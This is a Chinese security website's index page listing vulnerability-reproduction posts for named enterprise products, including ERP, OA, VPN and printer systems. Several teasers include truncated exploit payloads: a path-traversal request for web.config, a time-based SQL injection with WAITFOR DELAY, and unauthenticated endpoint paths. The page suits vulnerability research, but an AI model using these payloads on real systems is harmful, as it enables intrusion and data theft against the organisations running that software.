漏洞复现 - 第 68 | CN-SEC 中文网

安全漏洞

汇智ERP filehandle.aspx 任意文件读取漏洞

0x01 免责声明免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性...

07月28日33 views评论

阅读全文

安全漏洞

用友U8 Cloud MeasureQueryFrameAction SQL注入漏洞

07月28日82 views评论

阅读全文

安全漏洞

Bazaar v1.4.3 任意文件读取漏洞复现(CVE-2024-40348)

07月26日87 views评论

阅读全文

万户-ezOffice-SQL

W1-23万户-ezOffice-SQL 漏洞复现： payload： /defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?Recor...

07月26日安全漏洞24 views已关闭评论

阅读全文

安全漏洞

1Sharp-多功能打印机-PermissionAC

S40-1Sharp-多功能打印机-PermissionAC 漏洞复现： payload： /installed_emanual_list.html 效果图：

07月26日33 views已关闭评论

阅读全文

安全漏洞

奇安信-网神SecSSL3600-PermissionAC

Q1-13奇安信-网神SecSSL3600-PermissionAC 漏洞复现： payload： POST /changepass.php?type=2 HTTP/1.1 host: Cookie:...

07月26日81 views已关闭评论

阅读全文

紫光-电子档案管理系统-PermissionAC

Z17-1紫光-电子档案管理系统-PermissionAC 漏洞复现： payload： /Archive/ErecordOffice/openOfficeFile

07月26日安全漏洞79 views已关闭评论

阅读全文

拓尔思-TRSWAS5.0-PermissionAC

T19-1拓尔思-TRSWAS5.0-PermissionAC 漏洞复现： payload： /mas/servlets/uploadThumb?appKey=sv&uploading=1

07月26日安全漏洞94 views已关闭评论

阅读全文

SuiteCRM-SQL

S39-1SuiteCRM-SQL 漏洞复现： payload： GET /index.php?entryPoint=responseEntryPoint&event=1&delega...

07月26日安全漏洞21 views已关闭评论

阅读全文

赛蓝-企业管理系统-任意文件读取

S38-2赛蓝-企业管理系统-任意文件读取漏洞复现： payload： GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1 Host: Us...

07月26日安全漏洞15 views已关闭评论

阅读全文

livenvr-青柿视频管理系统-PermissionAC

L16-1livenvr-青柿视频管理系统-PermissionAC 漏洞复现： paylaod1 payload： GET /api/v1/device/channeltree?serial=&am...

07月26日安全漏洞27 views已关闭评论

阅读全文

科荣-AIO-SQL

K1-5科荣-AIO-SQL 漏洞复现： payload： GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:5'--&...

07月26日安全漏洞11 views已关闭评论

阅读全文

汇智ERP filehandle.aspx 任意文件读取漏洞

用友U8 Cloud MeasureQueryFrameAction SQL注入漏洞

Bazaar v1.4.3 任意文件读取漏洞复现(CVE-2024-40348)

万户-ezOffice-SQL

1Sharp-多功能打印机-PermissionAC

奇安信-网神SecSSL3600-PermissionAC

紫光-电子档案管理系统-PermissionAC

拓尔思-TRSWAS5.0-PermissionAC

SuiteCRM-SQL

赛蓝-企业管理系统-任意文件读取

livenvr-青柿视频管理系统-PermissionAC

科荣-AIO-SQL

在线咨询

微信